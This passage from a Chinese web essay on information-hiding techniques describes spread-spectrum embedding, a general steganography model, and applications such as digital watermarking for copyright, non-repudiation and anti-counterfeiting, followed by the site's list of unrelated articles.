当对伪装对象进行过滤操作时可能会消除秘密信息,解决的方法就是重复编码,即扩展隐藏信息。在整个伪装载体中多次嵌入一个比特,使得隐藏信息在过滤后仍能保留下来,这种方法虽然传输效率不高,但却简单健壮。在实际应用中,扩频技术一般是使用比发送的信息数据速率高许多倍的伪随机码,将载有信息数据的基带信号频谱进行扩展,形成宽带低功率谱密度信号。最典型的扩频技术为直序扩频和跳频扩频。扩展频谱方法的优点,是检测信息不要求原始信号,即在检测时可进行盲检测,即使信号在传输过程中受到了加性噪音和乘性噪音的攻击,也能在接收端检测到隐藏信息的存在。其缺点是载体信息必须与秘密信息同步,一旦受到失去同步的攻击,在接收端就很难检测到秘密信息的存在,而且检测过程比较复杂。

5 信息隐藏的通用模型及其应用

5.1 通用模型

在信息隐藏学中,通常称待隐藏的秘密信息为嵌入对象,将用于隐藏嵌入对象的公开信息称为掩体对象,嵌入对象和掩体对象可以是文本、***像或音频等等。通过使用特定的嵌入算法,可将嵌入对象添加到可公开的掩体对象中,从而生成隐藏对象,这一过程称为嵌入过程。相反地,使用特定的提取算法从隐藏对象中提取出嵌入对象的过程则称为提取过程,执行嵌入过程和提取过程的个人或组织分别称为嵌入者和提取者。对信息隐藏技术的研究由隐藏技术和隐藏分析技术两部分组成。隐藏技术主要研究如何将秘密信息嵌入到掩体对象中生成隐藏对象,称隐藏技术的研究者为隐藏者,而隐藏分析技术则主要考虑如何从隐藏对象中检测并破译出嵌入信息,或对隐藏对象进行某些处理以达到破坏嵌入信息的目的,隐藏分析技术的研究者称为隐藏分析者。***3描述了一个信息隐藏系统的通用模型。

从***3中可以看到,隐藏者在嵌入过程中利用嵌入密钥将嵌入对象添加到掩体对象中,生成隐藏对象,隐藏对象在传送过程中可能会被隐藏分析者截获并进行某些处理后再发送;提取过程则是在提取密钥的参与下从所接收到的隐藏对象中提取出嵌入对象,有些提取过程并不需要掩体对象的参与,这样的系统称为盲隐藏技术,而那些需要掩体对象参与的系统则称为非盲隐藏技术。若嵌入过程和提取过程采用相同的密码,这样的信息隐藏技术称为对称信息隐藏技术,反之,则称为非对称信息隐藏技术。

5.2 应用

1) 数据保密:在因特网上传输一些数据要防止非授权用户截获并使用, 这是网络安全的一个重要内容。随着经济的全球化, 这一点不仅将涉及***治、***事, 还将涉及到商业、金融和个人隐私。而我们可以通过使用信息隐藏技术来保护在网上交流的信息, 如: 电子商务中的敏感信息、谈判双方的秘密协议和合同、网上银行交易中的敏感数据信息、重要文件的数字签名和个人隐私等。另外, 还可以对一些不愿为别人所知道的内容使用信息隐藏的方式进行隐藏存储。

2) 数据的不可抵赖性:在网上交易中, 交易双方的任何一方不能抵赖自己曾经做出的行为, 也不能否认曾经接收到对方的信息, 这是交易系统中的一个重要环节。这可以使用信息隐藏技术中水印技术, 在交易体系的任何一方发送或接收信息时, 将各自的特征标记以水印的形式加入到传递的信息中, 这种水印应是不能被去除的, 以达到确认其行为的目的。

3) 数字作品的版权保护:版权保护是信息隐藏技术中的水印技术所试***解决的一个重要问题。随着网络和数字技术的快速普及,通过网络向人们提供的数字服务也会越来越多, 如数字***书馆、数字***书出版、数字电视、数字新闻等。这些服务提供的都是数字作品, 数字作品具有易修改、易复制的特点, 当今就已经成为迫切需要解决的实际问题。数字水印技术可以成为解决此难题的一种方案: 服务提供商在向用户发放作品的同时, 将双方的信息代码以水印的形式隐藏在作品中, 这种水印从理论上讲应该是不被破坏的。当发现数字作品在非法传播时, 可以通过提取出的水印代码追查非法散播者。

4) 防伪:商务活动中的各种票据的防伪也是信息隐藏技术可以用武之地。在数字票据中隐藏的水印经过打印后仍然存在, 可以通过再扫描回数字形式, 提取防伪水印, 已证实票据的真实性。

5) 数据的完整性:对于数据完整性的验证是要确认数据在网上传输或存储过程中并没有被窜改。通过使用脆弱水印技术保护的媒体一旦被窜改就会破坏水印, 从而很容易被识别。

6 结束语

信息隐藏技术作为信息安全领域的一个研究热点,已经引起很多专家和学者的关注,在短短几年的时间里取得了很大进展。但是信息隐藏技术尚未发展到可实用的阶段,还有待于许多技术问题的进一步解决。

参考文献:

转载请注明出处我优求知网 » 隐藏技术论文大全

学习

初中数学学术论文大全

阅读(26)

本文为您介绍初中数学学术论文大全,内容包括初中数学学术论文哪里发表,初中数学学术论文。2.1抽象内容形象化,知识点解释生动化。数学知识是复杂和抽象的,一些学生学习起来会有困难,而多媒体课件的出现可以很好的解决这一问题。优质画面

学习

实习中期自我总结大全

阅读(29)

本文为您介绍实习中期自我总结大全,内容包括中期实习小结怎么写,实习自我鉴定总结300字。在本次实习的两个月里,我深深体会到团队合作的重要性,并勇于展现自我。自从来到这里,我们为人处事的方法有所改变,最明显的是我们转化了做事的方法,原

学习

规划局工作总结大全

阅读(29)

本文为您介绍规划局工作总结大全,内容包括规划局工作总结,规划局工作总结范文。(二)强化规划监督管理,提高依法行***水平1、强化审批管理。加强规划的审查和批后管理,逐步做到了规划管理制度化、规划验收公开化、规划审批阳光化。在规划方案

学习

交通土建工程论文大全

阅读(24)

本文为您介绍交通土建工程论文大全,内容包括土建高级工程师论文范文,交通土建工程论文。在***提倡实施“卓越工程师教育培养计划”的大背景下,交通土建方向需要更新工程教育理念,以多年积淀的办学经验、办学特色和优势为基础,通过与行业和

学习

科技咨询论文大全

阅读(26)

本文为您介绍科技咨询论文大全,内容包括科技资讯论文,科技方面的小论文电子版。科技咨询有史以来都在为国家、地区、区域、行业和企事业法人主体提供决策咨询服务,提供科学论证、战略发展等决策咨询,为各层次、各行业的建设者提供可行性研

学习

新员工月工作总结大全

阅读(34)

本文为您介绍新员工月工作总结大全,内容包括普通员工个人工作总结20篇,电力员工个人工作总结20篇。(二)严格履行岗位职责,扎实做好本职工作在这几个月中,本人以高度的责任感和事业心,自觉服从组织和领导的安排,努力做好各项工作,较好地完成了

学习

版八年级下英语总结大全

阅读(25)

本文为您介绍版八年级下英语总结大全,内容包括八年级英语归纳总结人教版,八年级英语上册知识点总结完整版。另外,还有相当一部分的阅读材料是可以采取激活学生的背景知识的方法来导入的。如外研版《英语》八年级上册Module10LaoSheTeaho

学习

市场推广策划方案大全

阅读(26)

本文为您介绍市场推广策划方案大全,内容包括市场推广策划思路和方法,饮料市场推广策划方案。目标市场拓展维度:既扩大市场的覆盖范围。可以是地域的扩展,也可以是客户类型的扩大(年龄、性别、职业、收入、家庭情况等),还可以是销售渠道的跨界

学习

撤回执行申请书大全

阅读(27)

本文为您介绍撤回执行申请书大全,内容包括撤回申请执行书的正确写法,撤回执行申请文书格式。1994年9月上海生力生物技术有限公司(定作方,以下称“上海公司”)因加工承揽合同纠纷向法院起诉杭州爱康生物公司(承揽方,以下称“杭州公司),经区法院

学习

小学足球教案大全

阅读(26)

本文为您介绍小学足球教案大全,内容包括足球1v1突破训练教案,幼儿园足球教案100例。4.教学重难点分析:从学生的学习方面重难点分析,教学内容的重难点分析,教学方法的重难点分析,教学组织的重难点分析,这几方面分析入手。5.教案:教案不要固守格

学习

防火教案大全

阅读(20)

本文为您介绍防火教案大全,内容包括防火知识教案,防火安全教案大全。(一)主要宣传内容1、大力宣传《***森林防火条例》、《吉林省森林防火条例》、《吉林省人民***府2020年森林防火命令》和《吉林省人民***府关于禁止露天焚烧农作物秸秆的

学习

装饰培训总结大全

阅读(23)

本文为您介绍装饰培训总结大全,内容包括装饰装修培训心得体会,装饰业务流程培训心得。首先对从业人员现状、岗位职责、工作内容、工作标准、专业知识、能力结构等几个方面进行考察及分析,并组织专业教师走访了多家有市场优势的装饰企业,充

学习

样本行业调查报告大全

阅读(25)

本文为您介绍样本行业调查报告大全,内容包括行业调查报告免费,行业调查问题分析报告模板。三、调查内容1.调查辖区内工业企业、矿山企业(探、采、选)、规模畜禽养殖业、农副产品加工业企业的数量及生产规模、排污口数量及污水排放量、排放

学习

煎药师工作总结大全

阅读(26)

本文为您介绍煎药师工作总结大全,内容包括煎药师工作总结,煎药员的工作总结。1.2机械化生产,优于传统煎煮。中药配方颗粒代替中药饮片用于临床,从而根本改变了几千年来中药饮片以根、茎、叶、花、果实等用砂锅直接入药煎煮的方法。患者可

学习

初中数学学术论文大全

阅读(26)

本文为您介绍初中数学学术论文大全,内容包括初中数学学术论文哪里发表,初中数学学术论文。2.1抽象内容形象化,知识点解释生动化。数学知识是复杂和抽象的,一些学生学习起来会有困难,而多媒体课件的出现可以很好的解决这一问题。优质画面

学习

实习中期自我总结大全

阅读(29)

本文为您介绍实习中期自我总结大全,内容包括中期实习小结怎么写,实习自我鉴定总结300字。在本次实习的两个月里,我深深体会到团队合作的重要性,并勇于展现自我。自从来到这里,我们为人处事的方法有所改变,最明显的是我们转化了做事的方法,原

学习

规划局工作总结大全

阅读(29)

本文为您介绍规划局工作总结大全,内容包括规划局工作总结,规划局工作总结范文。(二)强化规划监督管理,提高依法行***水平1、强化审批管理。加强规划的审查和批后管理,逐步做到了规划管理制度化、规划验收公开化、规划审批阳光化。在规划方案

学习

交通土建工程论文大全

阅读(24)

本文为您介绍交通土建工程论文大全,内容包括土建高级工程师论文范文,交通土建工程论文。在***提倡实施“卓越工程师教育培养计划”的大背景下,交通土建方向需要更新工程教育理念,以多年积淀的办学经验、办学特色和优势为基础,通过与行业和

学习

科技咨询论文大全

阅读(26)

本文为您介绍科技咨询论文大全,内容包括科技资讯论文,科技方面的小论文电子版。科技咨询有史以来都在为国家、地区、区域、行业和企事业法人主体提供决策咨询服务,提供科学论证、战略发展等决策咨询,为各层次、各行业的建设者提供可行性研

学习

新员工月工作总结大全

阅读(34)

本文为您介绍新员工月工作总结大全,内容包括普通员工个人工作总结20篇,电力员工个人工作总结20篇。(二)严格履行岗位职责,扎实做好本职工作在这几个月中,本人以高度的责任感和事业心,自觉服从组织和领导的安排,努力做好各项工作,较好地完成了

学习

版八年级下英语总结大全

阅读(25)

本文为您介绍版八年级下英语总结大全,内容包括八年级英语归纳总结人教版,八年级英语上册知识点总结完整版。另外,还有相当一部分的阅读材料是可以采取激活学生的背景知识的方法来导入的。如外研版《英语》八年级上册Module10LaoSheTeaho

学习

年中工作报告大全

阅读(25)

本文为您介绍年中工作报告大全,内容包括年中工作报告范文,年中工作报告大标题。1、建立和完善了中心的各项管理制度;今年上半年,中心出台和转发了中心管理办法,窗口考勤管理制度,窗口信息系统管理制度,奖惩制度及学习、考察、培训方案,实现了